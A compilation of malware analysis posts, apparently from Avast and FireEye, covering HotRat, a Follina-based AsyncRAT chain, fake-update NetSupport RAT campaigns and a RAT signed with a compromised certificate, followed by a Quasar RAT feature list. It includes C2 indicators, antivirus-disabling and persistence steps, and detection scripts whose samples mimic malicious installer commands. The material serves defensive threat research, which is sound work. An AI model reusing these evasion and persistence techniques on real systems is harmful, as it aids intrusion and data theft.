Several samples have hardcoded C2 servers and ports. However, most C2 servers are reached through free dynamic DNS services, and the client port differs for each DNS record, so it is sometimes impossible to track the final IP addresses.
We have identified two IP addresses and ports as follows:
185.205.209.206:1114
108.143.240.80:112
The list of captured DNS records is following:
fon1[.]sells-it.net
foxn1[.]sells-it.net
srxy123[.]is-a-geek.com
websites[.]theworkpc.com
dynsys[.]is-a-guru.com
rec[.]casacam.net
samaerx[.]ddnsfree.com
The communication protocol between clients and C2 servers is the same as in the original AsyncRAT implementation.
Anti-Detection and Bypass System Security
Since HotRat runs with admin privileges, it is easy for the attackers to change security settings. As noted above, the installation process includes specific actions to evade most antivirus products and weaken system security.
There are a few methods to remove antivirus software. The Avira AV is deactivated using a simple command to uninstall the Endpoint Protection SDK, as follows:
Even when Windows Defender is not deactivated, the installation process adds the whole C:\ path to its exclusion list.
The remaining AVs HotRat detects (Malwarebytes, Avast, AVG, and McAfee) are deactivated through the IObit Unlocker tool, whose kernel driver removes system-protected files. HotRat identifies them with a simple folder-existence test on these paths:
C:\Program Files\Avast Software
C:\Program Files\AVG
C:\Program Files\Common Files\McAfee
C:\Program Files\Malwarebytes\Anti-Malware
HotRat also switches off the Consent Admin setting so that operations requiring elevation proceed without consent or credentials, because the AutoHotkey script launches other supporting executables that need higher permissions. The following registry update turns off the consent prompt:
HotRat detections first rose significantly in mid-October 2022; since then we have observed a stable level of activity in the wild.
The most affected regions are Africa, South Asia, Central and Eastern Europe, and North America. The map below illustrates the detailed distribution and risk ratio of HotRat malware in the wild.
Abused Software
The list of abused software is varied. As we mentioned above, the attackers focus on the most wanted software in the field of video games, image and sound editing, office applications, and system tools.
Unfortunately, due to its popularity, the brand name of one of our products, CCleaner, was also misused to spread HotRat via an illegal copy of the product. We encourage users to download CCleaner directly from our server (ccleaner.com) to ensure they are installing an official, and therefore safe, copy of the software.
The list below summarizes the most frequently cracked software misused by the attackers utilizing HotRat malware.
Infected files are usually stored on public file-sharing sites; the most frequently seen are krakenfiles[.]com, send[.]cm, easybytez[.]com, easyupload[.]io, wetransfer[.]com, and www.mediafire[.]com. Some samples are hosted on dedicated servers instead, for example 51-83-136-132[.]xyz and s1-filecr[.]xyz. There is therefore no single central server hosting the malicious files.
Once the malicious files are stored on the various hosting servers, URLs to them are distributed to victims through multiple channels such as social networks, torrents, forums, and searchable public repositories. Figure 4 shows an example of a Facebook post and a forum post.
Attackers commonly employ a deceptive tactic of actively participating in online forums. Often, victims are searching these forums for assistance in downloading unauthorized software. However, the attackers mislead them by redirecting to alternative URLs where the HotRat malware is already waiting, as demonstrated in Figure 4.
Conclusion
Despite the known dangers, a persistent trend of software piracy exposes users to potential malware infections. In mid-October, we observed a spike in malware activity, wherein illegal software was bundled with a malicious AutoHotkey script that launched the HotRat malware on victims’ computers. The spread of this malware happens through public repositories, with links being disseminated on social networks and forums.
HotRat malware is an advanced version of AsyncRAT, armed with a multitude of spying and personal data theft capabilities. We examined the malware’s deployment process, which is straightforward and utilizes a basic form of encryption, PNG steganography, for delivering the final payload. Furthermore, the malware exhibits persistence by leveraging scheduled tasks, enabling it to maintain a foothold on infected systems. It can also eliminate antivirus programs, thus endangering the system’s overall security. The blend of uncomplicated deployment and antivirus removal underscores the potential threats posed by this malware.
It is critical to re-emphasize the caution against downloading dubious software from unverified sources, especially those demanding the deactivation of antivirus programs, as it can help curb the risk of malware infections and data breaches.
Our threat hunters have been busy searching for abuse of the recently-released zero-day remote code execution bug in Microsoft Office (CVE-2022-30190). As part of their investigations, they found evidence of a threat actor hosting malicious payloads on what appears to be an Australian VOIP telecommunications provider with a presence in the South Pacific nation of Palau.
Further analysis indicated that targets in Palau were sent malicious documents that, when opened, exploited this vulnerability, causing victim computers to contact the provider’s website, download and execute the malware, and subsequently become infected.
Key Observations
This threat was a complex multi-stage operation utilizing LOLBAS (Living off the Land Binaries And Scripts), which allowed the attacker to initialize the attack using the CVE-2022-30190 vulnerability within the Microsoft Support Diagnostic Tool. This vulnerability enables threat actors to run malicious code without the user downloading an executable to their machine which might be detected by endpoint detection.
Multiple stages of this malware were signed with a legitimate company certificate to add additional legitimacy and minimize the chance of detection.
First stage
The compromised website, pictured in the screenshot below, was used to host an executable disguised as “robots.txt”. We believe the name was chosen to avoid attracting attention if it appeared in network logs. Using the Diagnostics Troubleshooting Wizard (msdt.exe), this “robots.txt” file was downloaded, saved as Sihost.exe and then executed.
Second Stage, Sihost.exe
When the renamed “robots.txt” (now “Sihost.exe”) was executed by msdt.exe, it downloaded the second stage of the attack, a loader with the hash b63fbf80351b3480c62a6a5158334ec8e91fecd057f6c19e4b4dd3febaa9d447. This executable was then used to download and decrypt the third stage of the attack, an encrypted file stored as ‘favicon.svg’ on the same web server.
Third stage, favicon.svg
After this file has been decrypted, it is used to download the fourth stage of the attack from palau.voipstelecom.com[.]au. These files are named Sevntx64.exe and Sevntx.lnk and are then executed on the victims’ machines.
Fourth Stage, Sevntx64.exe and Sevntx64.lnk
When the file is executed, it loads a 66 KB shellcode from the AsyncRat malware family; Sevntx64.exe is signed with the same compromised certificate seen previously in “robots.txt”.
The screenshot below shows the executable loading the shellcode.
Final Stage, AsyncRat
Once the executable is loaded, the machine is fully compromised with AsyncRat; the trojan is configured to communicate with the server palau[.]voipstelecom[.]com[.]au on port 443.
We highly recommend Avast software to protect against the latest threats, and applying Microsoft’s patches to protect your Windows systems from the CVE-2022-30190 vulnerability.
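A hunting check for the chain described in these stages, added here as an example (it is not Avast's tooling): it flags msdt.exe spawned by an Office process and any sihost.exe running from outside System32 (where the genuine Shell Infrastructure Host lives), and ties the two together through the process tree. The event records are constructed for illustration; the Office image names are an assumption about which parents to treat as document viewers.

```python
"""Process-tree hunting for: Office -> msdt.exe -> masquerading Sihost.exe.
Constructed process-creation events (not from the incident); real telemetry
such as Sysmon EventID 1 carries the same pid/ppid/image fields."""
import ntpath

# Parents we treat as "a document was opened" (assumption: common Office hosts)
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# The only legitimate location of sihost.exe on a stock Windows install
LEGIT_SIHOST = r"c:\windows\system32\sihost.exe"

EVENTS = [  # constructed sample data
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\msdt.exe"},
    {"pid": 400, "ppid": 300, "image": r"C:\Users\victim\AppData\Local\Temp\Sihost.exe"},
    {"pid": 500, "ppid": 1,   "image": r"C:\Windows\System32\sihost.exe"},   # benign
    {"pid": 600, "ppid": 100, "image": r"C:\Windows\System32\msdt.exe"},     # user-launched
]


def basename(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def office_spawned_msdt(events):
    """Return pids of msdt.exe processes whose parent is an Office application."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if basename(e["image"]) == "msdt.exe" and parent and basename(parent["image"]) in OFFICE_IMAGES:
            hits.append(e["pid"])
    return hits


def masquerading_sihost(events):
    """Return pids of any sihost.exe that does not run from System32."""
    return [e["pid"] for e in events
            if basename(e["image"]) == "sihost.exe" and e["image"].lower() != LEGIT_SIHOST]


def ancestors(pid, by_pid):
    """Parent pids of `pid`, nearest first; stops at unknown parents or cycles."""
    chain, seen = [], {pid}
    while pid in by_pid:
        pid = by_pid[pid]["ppid"]
        if pid not in by_pid or pid in seen:
            break
        chain.append(pid)
        seen.add(pid)
    return chain


def chain_hits(events):
    """Masquerading sihost.exe processes that descend from an Office-spawned msdt.exe."""
    by_pid = {e["pid"]: e for e in events}
    msdt = set(office_spawned_msdt(events))
    return [pid for pid in masquerading_sihost(events) if msdt.intersection(ancestors(pid, by_pid))]
```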
Over the last few months, FireEye has tracked an in-the-wild campaign
that leverages compromised sites to spread fake updates. In some
cases, the payload was the NetSupport Manager remote access tool
(RAT). NetSupport Manager is a commercially available RAT that can be
used legitimately by system administrators for remotely accessing
client computers. However, malicious actors are abusing this
application by installing it to the victims’ systems without their
knowledge to gain unauthorized access to their machines. This blog
details our analysis of the JavaScript and components used in
instances where the identified payload was NetSupport RAT.
Infection Vector
The operator behind these campaigns uses compromised sites to spread
fake updates masquerading as Adobe Flash, Chrome, and Firefox updates.
When users navigate to the compromised website, the malicious
JavaScript file is downloaded, mostly from a Dropbox link. Before
delivering the payload, the JavaScript sends basic system information
to the server. After receiving further commands from the server, it
then executes the final JavaScript to deliver the final payload. In
our case, the JavaScript that delivers the payload is named Update.js,
and it is executed from %AppData% with the help of wscript.exe. Figure
1 shows the infection flow.
Figure 1: Infection Flow
In-Depth Analysis of JavaScript
The initial JavaScript file contains multiple layers of obfuscation.
Like other malicious scripts, the first layer has obfuscation that
builds and executes the second layer as a new function. The second
layer of the JavaScript contains the dec function, which is
used to decrypt and execute more JavaScript code. Figure 2 shows a
snapshot of the second layer.
Figure 2: Second Layer of Initial
JavaScript File
In the second JavaScript file, the malware author uses a tricky
method to make the analysis harder for reverse engineers. The author
uses the caller and callee function code to get the key
for decryption. During normal JavaScript analysis, if an analyst finds
any obfuscated script, the analyst tries to de-obfuscate or beautify
the script for analysis. JavaScript beautification tools generally add
line breaks and tabs to make the script code look better and easier to
analyze. The tools also try to rename the local variables and remove
unreferenced variables and code from the script, which helps to
analyze core code only.
But in this case, since the malware uses the caller and
callee function code to derive the key, if the analyst adds or
removes anything from the first or second layer script, the script
will not be able to retrieve the key and will terminate with an
exception. The code snippet in Figure 3 shows this trick.
Figure 3: Anti-Analysis Trick Implemented
in JavaScript (Beautified Code)
The code decrypts and executes the JavaScript code as a function.
This decrypted function contains code that initiates the network
connection. In the decoded function, the command and control (C2) URL
and a value named tid are hard-coded in the script and
protected with some encoded function.
During its first communication to the server, the malware sends the
tid value and the current date of the system in encoded format,
and waits for the response from the server. It decodes the server
response and executes the response as a function, as shown in Figure 4.
Figure 4: Initial Server Communication
and Response
The response from the server is JavaScript code that the malware
executes as a function named step2.
The step2 function uses WScript.Network and Windows Management
Instrumentation (WMI) to collect the following system information,
which it then encodes and sends to the server:
After sending the system information to the server, the response
from the server contains two parts: content2 and content3.
The script (step2 function) decodes both parts. The
decoded content3 part contains the function named
step3, as shown in Figure 5.
Figure 5: Decrypting and Executing
Response step3
The step3 function contains code that writes decoded
content2 into a %temp% directory as Update.js. Update.js
contains code to download and execute the final payload. The
step3 function also sends the resulting data, such as
runFileResult and _tempFilePath, to the server, as shown
in Figure 6.
Figure 6: Script to Drop and Execute Update.js
The Update.js file also contains multi-layer obfuscation. After
decoding, the JavaScript contains code to drop multiple files in
%AppData%, including a 7zip standalone executable (7za.exe),
password-protected archive (Loglist.rtf), and batch script (Upd.cmd).
We will talk more about these components later.
The JavaScript uses PowerShell commands to download the files from the
server, with the execution policy set to Bypass and the window style
set to Hidden so that nothing is shown to the end user.
Components of the Attack
Figure 7 shows the index of the malicious server where we have
observed the malware author updating the script content.
Figure 7: Index of Malicious Server
7za.exe: 7zip standalone executable
LogList.rtf: Password-protected archive file
Upd.cmd: Batch script to install the NetSupport Client
Downloads.txt: List of IPs (possibly the infected systems)
Get.php: Downloads LogList.rtf
Upd.cmd
This file is a batch script that extracts the archive file and
installs the remote control tool on the system. The script is
obfuscated with the variable substitution method. This file was
regularly updated by the malware author during our analysis.
After de-obfuscating the script, we can see the batch commands in
the script (Figure 8).
Figure 8: De-Obfuscated Upd.cmd Script
The script performs the following tasks:
Extract the archive using the 7zip executable with the password mentioned in the script.
After extraction, delete the downloaded archive file (loglist.rtf).
Disable Windows Error Reporting and App Compatibility.
Add the remote control client executable to the firewall’s allowed program list.
Run the remote control tool (client32.exe).
Add a Run registry entry named “ManifestStore”, or download a shortcut file to the Startup folder.
Hide the files using file attributes.
Delete all the artifacts (7zip executable, script, archive file).
Note: While analyzing the script, we found some typos in the
script (Figure 9). Yes, malware authors make mistakes too. This script
might have been in a beta phase; in a later version of the script, the
author removed these typos.
Figure 9: Registry Entry Bloopers
Artifact Cleaning
As mentioned, the script contains code to remove the artifacts used
in the attack from the victim’s system. While monitoring the server,
we also observed some changes in the script related to this code, as
shown in Figure 10.
Figure 10: Artifact Cleaning Commands
The highlighted command in one of the variants indicates that it
might drop or use this file in the attack. The file could be a decoy document.
Persistence Mechanism
During our analysis, we observed two variants of this attack with
different persistence mechanisms.
In the first variant, the malware author uses a RUN registry entry
to remain persistent in the system.
In the second variant, the malware author uses the shortcut file
(named desktop.ini.lnk), which is hosted on the server. It
downloads the shortcut file and places it into the Startup folder, as
shown in Figure 11.
Figure 11: Downloading Shortcut File
The target command for the shortcut file points to the remote
application “client32.exe,” which was dropped in %AppData%, to start
the application on startup.
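The installer tasks listed for Upd.cmd and the two persistence variants (Run key versus Startup-folder shortcut) can be hunted in process command-line telemetry. The rules and sample command lines below are an added example, not the malware's script or FireEye's detection content; the sample lines are constructed to resemble the described actions, and the WER registry path and netsh syntax are my assumptions about how a batch script would achieve them.

```python
"""Command-line hunting rules for the NetSupport installer behaviours above.
Sample sessions are constructed; they are not copied from the malware."""
import re

# tag -> case-insensitive regex over one process command line
RULES = {
    "7zip_password_extract":   re.compile(r"7za?\.exe\s+x\b.*\s-p\S+", re.I),
    "wer_disabled":            re.compile(r"reg(\.exe)?\s+add\b.*windows error reporting.*\bdisabled\b", re.I),
    "firewall_allow_client32": re.compile(r"netsh\s+advfirewall\s+firewall\s+add\s+rule\b.*client32\.exe", re.I),
    "run_key_manifeststore":   re.compile(r"reg(\.exe)?\s+add\b.*\\currentversion\\run\b.*\bmanifeststore\b", re.I),
    "startup_folder_lnk":      re.compile(r"\\startup\\.*\.lnk|\.lnk\b.*\\startup\\", re.I),
    "hide_attributes":         re.compile(r"\battrib\b.*\+h\b", re.I),
    "artifact_cleanup":        re.compile(r"\b(del|erase)\b.*\b(7za?\.exe|loglist\.rtf|upd\.cmd)\b", re.I),
}

# Constructed session resembling the first variant (Run-key persistence)
SESSION_RUNKEY = [
    r'7za.exe x LogList.rtf -pExamplePass -oC:\Users\v\AppData\Roaming',
    r'del /f /q C:\Users\v\AppData\Roaming\LogList.rtf',
    r'reg add "HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting" /v Disabled /t REG_DWORD /d 1 /f',
    r'netsh advfirewall firewall add rule name="Client" dir=in action=allow program="C:\Users\v\AppData\Roaming\client32.exe"',
    r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ManifestStore /t REG_SZ /d "C:\Users\v\AppData\Roaming\client32.exe" /f',
    r'attrib +h +s C:\Users\v\AppData\Roaming\client32.exe',
]
# Constructed fragment of the second variant (shortcut dropped into Startup)
SESSION_STARTUP = [
    r'copy /y C:\Users\v\AppData\Local\Temp\desktop.ini.lnk "C:\Users\v\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"',
]
BENIGN = [r'ipconfig /all', r'attrib -r C:\Users\v\notes.txt', r'reg add HKCU\Software\Vendor\App /v Theme /d dark /f']


def classify(cmdline):
    """Tags of every rule that matches one command line."""
    return sorted(tag for tag, rx in RULES.items() if rx.search(cmdline))


def scan(cmdlines):
    """Map each tag to the 1-based indices of the lines that triggered it."""
    hits = {}
    for i, line in enumerate(cmdlines, 1):
        for tag in classify(line):
            hits.setdefault(tag, []).append(i)
    return hits


def persistence_variant(cmdlines):
    """'run_key', 'startup_shortcut', or None, mirroring the two observed variants."""
    tags = scan(cmdlines)
    if "run_key_manifeststore" in tags:
        return "run_key"
    if "startup_folder_lnk" in tags:
        return "startup_shortcut"
    return None


def is_suspicious(cmdlines, threshold=3):
    """Several distinct installer behaviours in one session is the installer pattern."""
    return len(scan(cmdlines)) >= threshold
```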
LogList.rtf
Although the file extension is .rtf, the file is actually a 7zipped
archive. This archive file is password-protected and contains the
NetSupport Manager RAT. The script upd.cmd contains the password to
extract the archive.
The major features provided by the NetSupport tool include:
Remote desktop
File transfer
Remote inventory and system information
Launching applications on the client’s machine
Geolocation
Downloads.txt
This file contains a list of IP addresses, which could be
compromised systems. Each IP address is listed along with a User-Agent
string. The IP addresses in the file belong to various regions, mostly
the U.S., Germany, and the Netherlands.
Conclusion
RATs are widely used for legitimate purposes, often by system
administrators. However, since they are legitimate applications and
readily available, malware authors can easily abuse them and sometimes
can avoid user suspicion as well.
The FireEye HX Endpoint platform successfully detects this attack at
the initial phase of the attack cycle.
Acknowledgement
Thanks to my colleagues Dileep Kumar Jallepalli, Rakesh Sharma and
Kimberly Goody for their help in the analysis.
Avast Threat Intelligence Team has found a remote access tool (RAT) actively being used in the wild in the Philippines that uses what appears to be a compromised digital certificate belonging to the Philippine Navy. This certificate is now expired but we see evidence it was in use with this malware in June 2020.
Based on our research, we believe with a high level of confidence that the threat actor had access to the private key belonging to the certificate.
Because this is being used in active attacks now, we are releasing our findings immediately so organizations can take steps to better protect themselves. We have found that this sample is now available on VirusTotal.
Compromised Expired Philippine Navy Digital Certificate
In our analysis we found the sample connects to dost[.]igov-service[.]net:8443 using TLS in a statically linked OpenSSL library.
A WHOIS lookup on the C&C domain gave us the following:
The digital certificate was pinned so that the malware requires the certificate to communicate.
When we checked the digital certificate used for the TLS channel we found the following information:
Some important things to note:
The certificate is a valid certificate with a subject of *.navy.mil.ph, the Philippine Navy.
The certificate has recently expired: it was valid for one year, from Sunday December 15, 2019 until Tuesday December 15, 2020.
Based on our research, we believe with a high level of confidence that the threat actor had access to the private key belonging to the certificate.
While the digital certificate is now expired we see evidence it was in use with this malware in June 2020.
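Two of the points above, a certificate whose subject does not match the contacted host and continued use of a pinned certificate after it expires, can be checked mechanically over observed TLS connections. The following is an added example, not Avast's analysis code; the observation dates are constructed, and the SAN list is assumed because the text gives only the subject.

```python
"""Flag TLS connections where the presented certificate does not name the
server, or is used outside its validity window. Records are constructed from
the details in the text (subject *.navy.mil.ph, valid 2019-12-15 to 2020-12-15,
C&C host dost.igov-service.net); observation days are made up."""
from datetime import datetime, timezone


def hostname_matches(host, pattern):
    """RFC 6125-style match: a leading '*' covers exactly one left-most label."""
    host, pattern = host.lower().rstrip("."), pattern.lower().rstrip(".")
    if not pattern.startswith("*."):
        return host == pattern
    suffix = pattern[1:]                       # e.g. ".navy.mil.ph"
    return (len(host) > len(suffix) and host.endswith(suffix)
            and "." not in host[:-len(suffix)])


def assess(record):
    """Return the anomalies for one observed connection, in a fixed order."""
    findings = []
    names = [record["subject_cn"]] + record.get("sans", [])
    if not any(hostname_matches(record["server"], n) for n in names):
        findings.append("name_mismatch")
    if not (record["not_before"] <= record["observed"] <= record["not_after"]):
        findings.append("outside_validity")
    return findings


CERT = {  # from the text; SAN entry assumed to mirror the subject
    "subject_cn": "*.navy.mil.ph", "sans": ["*.navy.mil.ph"],
    "not_before": datetime(2019, 12, 15, tzinfo=timezone.utc),
    "not_after": datetime(2020, 12, 15, tzinfo=timezone.utc),
}

OBSERVATIONS = [  # constructed sightings
    # June 2020: wrong name for the host, but still inside the validity window
    dict(CERT, server="dost.igov-service.net", observed=datetime(2020, 6, 10, tzinfo=timezone.utc)),
    # the same pinned certificate presented after expiry
    dict(CERT, server="dost.igov-service.net", observed=datetime(2021, 1, 5, tzinfo=timezone.utc)),
    # what legitimate use of this certificate would look like
    dict(CERT, server="mail.navy.mil.ph", observed=datetime(2020, 6, 10, tzinfo=timezone.utc)),
]


def triage(observations):
    """(server, date, anomalies) for every observation, anomalous ones first."""
    rows = [(o["server"], o["observed"].date().isoformat(), assess(o)) for o in observations]
    return sorted(rows, key=lambda r: -len(r[2]))
```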
The malicious PE file was found with filename: C:\Windows\System32\wlbsctrl.dll and its hash is: 85FA43C3F84B31FBE34BF078AF5A614612D32282D7B14523610A13944AADAACB.
In analyzing that malicious PE file itself, we found that the compilation timestamp is wrong or was edited. Specifically, the TimeDateStamp of the PE file was modified and set to the year 2004 in both the PE header and Debug Directory as shown below:
However, we found that the author used OpenSSL 1.1.1g and compiled it on April 21, 2020 as shown below:
The username of the author was probably udste. This can be seen in the debug information left inside the used OpenSSL library.
We found that the malware supported the following commands:
run shellcode
read file
write file
cancel data transfer
list drives
rename a file
delete a file
list directory content
Some additional items of note regarding the malicious PE file:
All configuration strings in the malware are encrypted using AES-CBC with the exception of the mutex it uses. That mutex is used as-is without decryption: t7As7y9I6EGwJOQkJz1oRvPUFx1CJTsjzgDlm0CxIa4=.
When this string is decrypted using the hard-coded key it decrypts to QSR_MUTEX_zGKwWAejTD9sDitYcK. We suspect that this is a failed attempt to disguise this malware as the infamous Quasar RAT malware. But this cannot be the case because this sample is written in C++ and the Quasar RAT is written in C#.
Avast customers are protected against this malware.
I (qwqdanchun) am not responsible for any actions and/or damages caused by your use or dissemination of the software. You are fully responsible for any use of the software and acknowledge that the software is only used for educational and research purposes. If you download the software or the source code of the software, you automatically agree with the above content.
Quasar is a fast and light-weight Windows remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring.
It aims to provide high stability and an easy-to-use user interface and is a free, open source tool.
Features of Quasar RAT Windows Remote Administration Tool
The main features that can be found in Quasar are:
TCP network stream (IPv4 & IPv6 support)
Fast network serialization (Protocol Buffers)
Compressed (QuickLZ) & Encrypted (TLS) communication
UPnP Support
Task Manager
File Manager
Startup Manager
Remote Desktop
Remote Shell
Remote Execution
System Information
Registry Editor
System Power Commands (Restart, Shutdown, Standby)
Keylogger (Unicode Support)
Reverse Proxy (SOCKS5)
Password Recovery (Common Browsers and FTP Clients)